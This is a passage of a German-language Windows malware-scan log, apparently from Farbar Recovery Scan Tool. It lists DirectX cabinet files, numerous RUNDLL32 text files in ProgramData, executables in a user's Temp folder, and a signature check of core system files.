2010-06-02 06:21 - 2010-06-02 06:21 - 0182903 _____ () C:\Program Files (x86)\AUG2006_XACT_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0137235 _____ () C:\Program Files (x86)\AUG2006_XACT_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0087142 _____ () C:\Program Files (x86)\AUG2006_xinput_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0046058 _____ () C:\Program Files (x86)\AUG2006_xinput_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0852286 _____ () C:\Program Files (x86)\AUG2007_d3dx10_35_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0796867 _____ () C:\Program Files (x86)\AUG2007_d3dx10_35_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1800160 _____ () C:\Program Files (x86)\AUG2007_d3dx9_35_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1708152 _____ () C:\Program Files (x86)\AUG2007_d3dx9_35_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0198096 _____ () C:\Program Files (x86)\AUG2007_XACT_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0153012 _____ () C:\Program Files (x86)\AUG2007_XACT_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0867612 _____ () C:\Program Files (x86)\Aug2008_d3dx10_39_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0849167 _____ () C:\Program Files (x86)\Aug2008_d3dx10_39_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1794084 _____ () C:\Program Files (x86)\Aug2008_d3dx9_39_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1464672 _____ () C:\Program Files (x86)\Aug2008_d3dx9_39_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0121772 _____ () C:\Program Files (x86)\Aug2008_XACT_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0092996 _____ () C:\Program Files (x86)\Aug2008_XACT_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0271412 _____ () C:\Program Files (x86)\Aug2008_XAudio_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0271038 _____ () C:\Program Files (x86)\Aug2008_XAudio_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0919044 _____ () C:\Program Files (x86)\Aug2009_D3DCompiler_42_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0900598 _____ () C:\Program Files (x86)\Aug2009_D3DCompiler_42_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 3112111 _____ () C:\Program Files (x86)\Aug2009_d3dcsx_42_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 3319740 _____ () C:\Program Files (x86)\Aug2009_d3dcsx_42_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0232635 _____ () C:\Program Files (x86)\Aug2009_d3dx10_42_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0192131 _____ () C:\Program Files (x86)\Aug2009_d3dx10_42_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0136301 _____ () C:\Program Files (x86)\Aug2009_d3dx11_42_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0105044 _____ () C:\Program Files (x86)\Aug2009_d3dx11_42_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0930116 _____ () C:\Program Files (x86)\Aug2009_d3dx9_42_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0728456 _____ () C:\Program Files (x86)\Aug2009_d3dx9_42_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0122408 _____ () C:\Program Files (x86)\Aug2009_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0093106 _____ () C:\Program Files (x86)\Aug2009_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0273264 _____ () C:\Program Files (x86)\Aug2009_XAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0272642 _____ () C:\Program Files (x86)\Aug2009_XAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1357976 _____ () C:\Program Files (x86)\Dec2005_d3dx9_28_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1079456 _____ () C:\Program Files (x86)\Dec2005_d3dx9_28_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0212807 _____ () C:\Program Files (x86)\DEC2006_d3dx10_00_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0191720 _____ () C:\Program Files (x86)\DEC2006_d3dx10_00_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1571154 _____ () C:\Program Files (x86)\DEC2006_d3dx9_32_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1574376 _____ () C:\Program Files (x86)\DEC2006_d3dx9_32_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0192475 _____ () C:\Program Files (x86)\DEC2006_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0145599 _____ () C:\Program Files (x86)\DEC2006_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0089944 _____ (Microsoft Corporation) C:\Program Files (x86)\DSETUP.dll
2010-06-02 06:22 - 2010-06-02 06:22 - 1801048 _____ () C:\Program Files (x86)\dsetup32.dll
2010-06-02 06:22 - 2010-06-02 06:22 - 0042410 _____ () C:\Program Files (x86)\dxdllreg_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0537432 _____ () C:\Program Files (x86)\DXSETUP.exe
2010-06-02 06:22 - 2010-06-02 06:22 - 0094011 _____ () C:\Program Files (x86)\dxupdate.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1247499 _____ () C:\Program Files (x86)\Feb2005_d3dx9_24_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1013225 _____ () C:\Program Files (x86)\Feb2005_d3dx9_24_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1362796 _____ () C:\Program Files (x86)\Feb2006_d3dx9_29_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1084720 _____ () C:\Program Files (x86)\Feb2006_d3dx9_29_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0178359 _____ () C:\Program Files (x86)\Feb2006_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0132409 _____ () C:\Program Files (x86)\Feb2006_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0194675 _____ () C:\Program Files (x86)\FEB2007_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0147983 _____ () C:\Program Files (x86)\FEB2007_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0054678 _____ () C:\Program Files (x86)\Feb2010_X3DAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0020713 _____ () C:\Program Files (x86)\Feb2010_X3DAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0122446 _____ () C:\Program Files (x86)\Feb2010_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0093180 _____ () C:\Program Files (x86)\Feb2010_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0276960 _____ () C:\Program Files (x86)\Feb2010_XAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0277191 _____ () C:\Program Files (x86)\Feb2010_XAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1336002 _____ () C:\Program Files (x86)\Jun2005_d3dx9_26_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1064925 _____ () C:\Program Files (x86)\Jun2005_d3dx9_26_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0180785 _____ () C:\Program Files (x86)\JUN2006_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0133671 _____ () C:\Program Files (x86)\JUN2006_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0699044 _____ () C:\Program Files (x86)\JUN2007_d3dx10_34_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0698472 _____ () C:\Program Files (x86)\JUN2007_d3dx10_34_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1607774 _____ () C:\Program Files (x86)\JUN2007_d3dx9_34_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1607286 _____ () C:\Program Files (x86)\JUN2007_d3dx9_34_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0197122 _____ () C:\Program Files (x86)\JUN2007_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0152909 _____ () C:\Program Files (x86)\JUN2007_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0867828 _____ () C:\Program Files (x86)\JUN2008_d3dx10_38_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0849919 _____ () C:\Program Files (x86)\JUN2008_d3dx10_38_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1792608 _____ () C:\Program Files (x86)\JUN2008_d3dx9_38_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1463878 _____ () C:\Program Files (x86)\JUN2008_d3dx9_38_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0055154 _____ () C:\Program Files (x86)\JUN2008_X3DAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0021905 _____ () C:\Program Files (x86)\JUN2008_X3DAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0121054 _____ () C:\Program Files (x86)\JUN2008_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0093128 _____ () C:\Program Files (x86)\JUN2008_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0269628 _____ () C:\Program Files (x86)\JUN2008_XAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0269024 _____ () C:\Program Files (x86)\JUN2008_XAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0944460 _____ () C:\Program Files (x86)\Jun2010_D3DCompiler_43_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0931471 _____ () C:\Program Files (x86)\Jun2010_D3DCompiler_43_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0752783 _____ () C:\Program Files (x86)\Jun2010_d3dcsx_43_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0762188 _____ () C:\Program Files (x86)\Jun2010_d3dcsx_43_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0235955 _____ () C:\Program Files (x86)\Jun2010_d3dx10_43_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0197283 _____ () C:\Program Files (x86)\Jun2010_d3dx10_43_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0138205 _____ () C:\Program Files (x86)\Jun2010_d3dx11_43_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0109445 _____ () C:\Program Files (x86)\Jun2010_d3dx11_43_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0937246 _____ () C:\Program Files (x86)\Jun2010_d3dx9_43_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0768036 _____ () C:\Program Files (x86)\Jun2010_d3dx9_43_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0124596 _____ () C:\Program Files (x86)\Jun2010_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0093686 _____ () C:\Program Files (x86)\Jun2010_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0277338 _____ () C:\Program Files (x86)\Jun2010_XAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0278060 _____ () C:\Program Files (x86)\Jun2010_XAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0844884 _____ () C:\Program Files (x86)\Mar2008_d3dx10_37_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0818260 _____ () C:\Program Files (x86)\Mar2008_d3dx10_37_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1769862 _____ () C:\Program Files (x86)\Mar2008_d3dx9_37_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1443282 _____ () C:\Program Files (x86)\Mar2008_d3dx9_37_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0055058 _____ () C:\Program Files (x86)\Mar2008_X3DAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0021867 _____ () C:\Program Files (x86)\Mar2008_X3DAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0122336 _____ () C:\Program Files (x86)\Mar2008_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0093734 _____ () C:\Program Files (x86)\Mar2008_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0251194 _____ () C:\Program Files (x86)\Mar2008_XAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0226250 _____ () C:\Program Files (x86)\Mar2008_XAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1067160 _____ () C:\Program Files (x86)\Mar2009_d3dx10_41_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1040745 _____ () C:\Program Files (x86)\Mar2009_d3dx10_41_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1973702 _____ () C:\Program Files (x86)\Mar2009_d3dx9_41_x64.cab
2010-06-02 06:22 - 2010-06-02
06:22 - 1612446 _____ () C:\Program Files (x86)\Mar2009_d3dx9_41_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0054600 _____ () C:\Program Files (x86)\Mar2009_X3DAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0021298 _____ () C:\Program Files (x86)\Mar2009_X3DAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0121506 _____ () C:\Program Files (x86)\Mar2009_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0092740 _____ () C:\Program Files (x86)\Mar2009_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0275044 _____ () C:\Program Files (x86)\Mar2009_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0273018 _____ () C:\Program Files (x86)\Mar2009_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0864600 _____ () C:\Program Files (x86)\Nov2007_d3dx10_36_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0803884 _____ () C:\Program Files (x86)\Nov2007_d3dx10_36_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1802058 _____ () C:\Program Files (x86)\Nov2007_d3dx9_36_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1709360 _____ () C:\Program Files (x86)\Nov2007_d3dx9_36_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0046144 _____ () C:\Program Files (x86)\NOV2007_X3DAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0018496 _____ () C:\Program Files (x86)\NOV2007_X3DAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0196762 _____ () C:\Program Files (x86)\NOV2007_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0148264 _____ () C:\Program Files (x86)\NOV2007_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0994154 _____ () C:\Program Files (x86)\Nov2008_d3dx10_40_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0965421 _____ () C:\Program Files (x86)\Nov2008_d3dx10_40_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1906878 _____ () C:\Program Files (x86)\Nov2008_d3dx9_40_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1550796 _____ () C:\Program Files (x86)\Nov2008_d3dx9_40_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0054522 _____ () C:\Program Files 
(x86)\Nov2008_X3DAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0021851 _____ () C:\Program Files (x86)\Nov2008_X3DAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0121794 _____ () C:\Program Files (x86)\Nov2008_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0092684 _____ () C:\Program Files (x86)\Nov2008_XACT_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0273960 _____ () C:\Program Files (x86)\Nov2008_XAudio_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0272611 _____ () C:\Program Files (x86)\Nov2008_XAudio_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0086037 _____ () C:\Program Files (x86)\Oct2005_xinput_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0045359 _____ () C:\Program Files (x86)\Oct2005_xinput_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1412902 _____ () C:\Program Files (x86)\OCT2006_d3dx9_31_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 1127217 _____ () C:\Program Files (x86)\OCT2006_d3dx9_31_x86.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0182361 _____ () C:\Program Files (x86)\OCT2006_XACT_x64.cab 2010-06-02 06:22 - 2010-06-02 06:22 - 0138017 _____ () C:\Program Files (x86)\OCT2006_XACT_x86.cab 2015-07-05 04:14 - 2015-07-05 04:14 - 0000911 _____ () C:\Users\Kenny G\AppData\Local\recently-used.xbel 2014-07-31 10:50 - 2014-07-31 10:51 - 0022400 _____ () C:\ProgramData\RUNDLL32.EXE-1180-F.txt 2014-07-06 17:23 - 2014-07-06 17:23 - 0244720 _____ () C:\ProgramData\RUNDLL32.EXE-12956-F.txt 2014-07-27 17:22 - 2014-07-28 13:07 - 0079618 _____ () C:\ProgramData\RUNDLL32.EXE-1384-F.txt 2014-07-10 10:53 - 2014-07-10 17:12 - 0298281 _____ () C:\ProgramData\RUNDLL32.EXE-1424-F.txt 2014-07-19 22:13 - 2014-07-20 00:37 - 0113345 _____ () C:\ProgramData\RUNDLL32.EXE-1436-F.txt 2014-07-30 09:52 - 2014-07-30 13:45 - 0181914 _____ () C:\ProgramData\RUNDLL32.EXE-1596-F.txt 2014-07-21 20:18 - 2014-07-21 22:11 - 0087977 _____ () C:\ProgramData\RUNDLL32.EXE-1788-F.txt 2014-07-18 05:35 - 2014-07-18 11:01 - 0242621 _____ () C:\ProgramData\RUNDLL32.EXE-2188-F.txt 
2014-07-31 18:04 - 2014-07-31 18:05 - 0001416 _____ () C:\ProgramData\RUNDLL32.EXE-2284-F.txt 2014-07-31 10:34 - 2014-07-31 10:45 - 0008414 _____ () C:\ProgramData\RUNDLL32.EXE-2308-F.txt 2014-07-18 22:37 - 2014-07-19 01:07 - 0118602 _____ () C:\ProgramData\RUNDLL32.EXE-2348-F.txt 2014-07-28 15:20 - 2014-07-28 15:52 - 0025184 _____ () C:\ProgramData\RUNDLL32.EXE-2444-F.txt 2014-07-29 22:22 - 2014-07-29 23:10 - 0038461 _____ () C:\ProgramData\RUNDLL32.EXE-2460-F.txt 2014-07-12 11:11 - 2014-07-12 12:12 - 0048083 _____ () C:\ProgramData\RUNDLL32.EXE-2480-F.txt 2014-07-10 19:57 - 2014-07-10 20:25 - 0007207 _____ () C:\ProgramData\RUNDLL32.EXE-2584-F.txt 2014-07-29 10:41 - 2014-07-29 12:12 - 0071934 _____ () C:\ProgramData\RUNDLL32.EXE-2904-F.txt 2014-07-16 20:21 - 2014-07-17 22:12 - 0478880 _____ () C:\ProgramData\RUNDLL32.EXE-3004-F.txt 2014-07-20 08:08 - 2014-07-20 11:56 - 0181099 _____ () C:\ProgramData\RUNDLL32.EXE-3044-F.txt 2014-08-01 06:26 - 2014-08-01 13:03 - 0282818 _____ () C:\ProgramData\RUNDLL32.EXE-3108-F.txt 2014-07-10 22:41 - 2014-07-10 23:23 - 0033087 _____ () C:\ProgramData\RUNDLL32.EXE-3160-F.txt 2014-07-12 04:26 - 2014-07-12 05:10 - 0035209 _____ () C:\ProgramData\RUNDLL32.EXE-3164-F.txt 2014-07-28 18:24 - 2014-07-28 19:58 - 0074219 _____ () C:\ProgramData\RUNDLL32.EXE-3264-F.txt 2014-08-07 06:42 - 2014-08-07 09:07 - 0076563 _____ () C:\ProgramData\RUNDLL32.EXE-3272-F.txt 2014-08-12 17:39 - 2014-08-12 17:48 - 0005807 _____ () C:\ProgramData\RUNDLL32.EXE-3288-F.txt 2014-08-12 18:47 - 2014-08-12 21:55 - 0104772 _____ () C:\ProgramData\RUNDLL32.EXE-3308-F.txt 2014-08-15 13:01 - 2014-08-15 13:53 - 0017691 _____ () C:\ProgramData\RUNDLL32.EXE-3356-F.txt 2014-08-14 16:21 - 2014-08-14 18:56 - 0059067 _____ () C:\ProgramData\RUNDLL32.EXE-3396-F.txt 2014-08-16 03:06 - 2014-08-16 04:02 - 0018161 _____ () C:\ProgramData\RUNDLL32.EXE-3452-F.txt 2014-08-03 08:19 - 2014-08-03 14:26 - 0294846 _____ () C:\ProgramData\RUNDLL32.EXE-3468-F.txt 2014-08-01 13:28 - 
2014-08-03 00:37 - 0583063 _____ () C:\ProgramData\RUNDLL32.EXE-3480-F.txt 2014-08-07 10:20 - 2014-08-08 02:21 - 0085411 _____ () C:\ProgramData\RUNDLL32.EXE-3500-F.txt 2014-08-16 02:53 - 2014-08-16 03:05 - 0004128 _____ () C:\ProgramData\RUNDLL32.EXE-3516-F.txt 2014-08-07 01:45 - 2014-08-07 05:13 - 0115168 _____ () C:\ProgramData\RUNDLL32.EXE-3524-F.txt 2014-08-14 11:31 - 2014-08-14 13:24 - 0035565 _____ () C:\ProgramData\RUNDLL32.EXE-3528-F.txt 2014-07-15 19:58 - 2014-07-15 21:04 - 0045897 _____ () C:\ProgramData\RUNDLL32.EXE-3548-F.txt 2014-08-15 20:50 - 2014-08-15 23:14 - 0052980 _____ () C:\ProgramData\RUNDLL32.EXE-3552-F.txt 2014-08-06 21:49 - 2014-08-06 23:29 - 0071408 _____ () C:\ProgramData\RUNDLL32.EXE-3560-F.txt 2014-08-04 05:01 - 2014-08-05 06:05 - 0508848 _____ () C:\ProgramData\RUNDLL32.EXE-3564-F.txt 2014-07-09 21:47 - 2014-07-09 23:03 - 0060832 _____ () C:\ProgramData\RUNDLL32.EXE-3576-F.txt 2014-08-12 15:19 - 2014-08-12 15:29 - 0005538 _____ () C:\ProgramData\RUNDLL32.EXE-3632-F.txt 2014-08-06 21:27 - 2014-08-06 21:30 - 0002580 _____ () C:\ProgramData\RUNDLL32.EXE-3656-F.txt 2014-08-08 03:06 - 2014-08-11 13:07 - 0049817 _____ () C:\ProgramData\RUNDLL32.EXE-3688-F.txt 2014-08-03 16:46 - 2014-08-03 20:12 - 0162566 _____ () C:\ProgramData\RUNDLL32.EXE-3716-F.txt 2014-07-26 00:51 - 2014-07-26 09:44 - 0140982 _____ () C:\ProgramData\RUNDLL32.EXE-3828-F.txt 2014-07-26 23:06 - 2014-07-31 18:22 - 0025692 _____ () C:\ProgramData\RUNDLL32.EXE-3836-F.txt 2014-07-27 01:58 - 2014-07-27 03:43 - 0082833 _____ () C:\ProgramData\RUNDLL32.EXE-3848-F.txt 2014-08-15 17:05 - 2014-08-15 18:28 - 0024905 _____ () C:\ProgramData\RUNDLL32.EXE-3900-F.txt 2014-08-05 09:40 - 2014-08-05 20:23 - 0262790 _____ () C:\ProgramData\RUNDLL32.EXE-4020-F.txt 2014-07-25 21:52 - 2014-07-28 22:06 - 0076241 _____ () C:\ProgramData\RUNDLL32.EXE-4028-F.txt 2014-07-30 03:30 - 2014-07-30 05:19 - 0086514 _____ () C:\ProgramData\RUNDLL32.EXE-4048-F.txt 2014-07-30 09:31 - 2014-07-30 09:50 - 
0012645 _____ () C:\ProgramData\RUNDLL32.EXE-4088-F.txt 2014-07-21 04:57 - 2014-07-21 14:44 - 0070566 _____ () C:\ProgramData\RUNDLL32.EXE-4092-F.txt 2014-07-11 11:19 - 2014-07-11 22:30 - 0228731 _____ () C:\ProgramData\RUNDLL32.EXE-4136-F.txt 2014-07-09 10:18 - 2014-07-09 11:48 - 0071159 _____ () C:\ProgramData\RUNDLL32.EXE-4148-F.txt 2014-07-29 14:02 - 2014-07-29 20:15 - 0170297 _____ () C:\ProgramData\RUNDLL32.EXE-4196-F.txt 2014-07-26 14:42 - 2014-07-26 15:48 - 0052128 _____ () C:\ProgramData\RUNDLL32.EXE-4212-F.txt 2014-07-14 17:22 - 2014-07-14 23:13 - 0274928 _____ () C:\ProgramData\RUNDLL32.EXE-4220-F.txt 2014-07-24 16:43 - 2014-07-25 04:36 - 0333823 _____ () C:\ProgramData\RUNDLL32.EXE-4292-F.txt 2014-07-08 18:10 - 2014-07-08 19:36 - 0067558 _____ () C:\ProgramData\RUNDLL32.EXE-4304-F.txt 2014-07-15 21:56 - 2014-07-15 23:43 - 0084278 _____ () C:\ProgramData\RUNDLL32.EXE-4328-F.txt 2014-07-07 12:11 - 2014-07-07 12:11 - 0967929 _____ () C:\ProgramData\RUNDLL32.EXE-4416-F.txt 2014-07-25 04:43 - 2014-07-25 20:32 - 0390092 _____ () C:\ProgramData\RUNDLL32.EXE-4440-F.txt 2014-07-12 05:11 - 2014-07-12 05:13 - 0002034 _____ () C:\ProgramData\RUNDLL32.EXE-4444-F.txt 2014-07-22 05:15 - 2014-07-22 06:02 - 0037273 _____ () C:\ProgramData\RUNDLL32.EXE-4448-F.txt 2014-07-21 17:40 - 2014-07-21 18:08 - 0022362 _____ () C:\ProgramData\RUNDLL32.EXE-4452-F.txt 2014-07-31 17:44 - 2014-07-31 17:44 - 0000282 _____ () C:\ProgramData\RUNDLL32.EXE-4540-F.txt 2014-07-13 12:53 - 2014-07-13 14:32 - 0078792 _____ () C:\ProgramData\RUNDLL32.EXE-4584-F.txt 2014-07-07 12:12 - 2014-07-07 14:05 - 0090638 _____ () C:\ProgramData\RUNDLL32.EXE-4604-F.txt 2014-07-31 17:35 - 2014-07-31 17:38 - 0002205 _____ () C:\ProgramData\RUNDLL32.EXE-4648-F.txt 2014-07-13 18:37 - 2014-07-14 17:20 - 0170811 _____ () C:\ProgramData\RUNDLL32.EXE-4736-F.txt 2014-07-13 08:58 - 2014-07-13 12:49 - 0182356 _____ () C:\ProgramData\RUNDLL32.EXE-4744-F.txt 2014-07-16 15:41 - 2014-07-16 20:04 - 0202579 _____ () 
C:\ProgramData\RUNDLL32.EXE-4780-F.txt 2014-07-31 17:53 - 2014-07-31 18:02 - 0007265 _____ () C:\ProgramData\RUNDLL32.EXE-4804-F.txt 2014-07-07 20:59 - 2014-07-07 22:47 - 0084404 _____ () C:\ProgramData\RUNDLL32.EXE-4808-F.txt 2014-07-08 20:17 - 2014-07-24 15:47 - 0414838 _____ () C:\ProgramData\RUNDLL32.EXE-4840-F.txt 2014-07-22 11:02 - 2014-07-23 06:10 - 0175986 _____ () C:\ProgramData\RUNDLL32.EXE-4920-F.txt 2014-07-19 08:24 - 2014-07-20 23:01 - 0130594 _____ () C:\ProgramData\RUNDLL32.EXE-5048-F.txt 2014-07-08 20:04 - 2014-07-08 20:13 - 0007500 _____ () C:\ProgramData\RUNDLL32.EXE-5068-F.txt 2014-07-12 13:09 - 2014-07-13 00:47 - 0294315 _____ () C:\ProgramData\RUNDLL32.EXE-5072-F.txt 2014-07-26 12:36 - 2014-07-26 14:05 - 0069795 _____ () C:\ProgramData\RUNDLL32.EXE-704-F.txt 2014-08-13 09:50 - 2014-08-13 19:20 - 0161035 _____ () C:\ProgramData\RUNDLL32.EXE-780-F.txt 2014-07-30 21:15 - 2014-07-30 23:07 - 0088664 _____ () C:\ProgramData\RUNDLL32.EXE-784-F.txt 2014-07-15 10:41 - 2014-07-15 18:31 - 0370403 _____ () C:\ProgramData\RUNDLL32.EXE-808-F.txt 2014-07-06 17:24 - 2014-07-07 04:48 - 0338635 _____ () C:\ProgramData\RUNDLL32.EXE-9648-F.txt Einige Dateien in TEMP: ==================== C:\Users\Kenny G\AppData\Local\Temp\DseShExt-x64.dll C:\Users\Kenny G\AppData\Local\Temp\DseShExt-x86.dll C:\Users\Kenny G\AppData\Local\Temp\newversion.exe C:\Users\Kenny G\AppData\Local\Temp\ose00000.exe C:\Users\Kenny G\AppData\Local\Temp\ose00002.exe C:\Users\Kenny G\AppData\Local\Temp\ose00003.exe C:\Users\Kenny G\AppData\Local\Temp\SDShelEx-win32.dll C:\Users\Kenny G\AppData\Local\Temp\SDShelEx-x64.dll C:\Users\Kenny G\AppData\Local\Temp\sqlite3.dll C:\Users\Kenny G\AppData\Local\Temp\Uninstall.exe ==================== Bamital & volsnap ================= (Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.) 
C:\Windows\system32\winlogon.exe => Datei ist digital signiert C:\Windows\system32\wininit.exe => Datei ist digital signiert C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert C:\Windows\explorer.exe => Datei ist digital signiert C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert C:\Windows\system32\svchost.exe => Datei ist digital signiert C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert C:\Windows\system32\services.exe => Datei ist digital signiert C:\Windows\system32\User32.dll => Datei ist digital signiert C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert C:\Windows\system32\userinit.exe => Datei ist digital signiert C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert C:\Windows\system32\rpcss.dll => Datei ist digital signiert C:\Windows\system32\dnsapi.dll => Datei ist digital signiert C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert 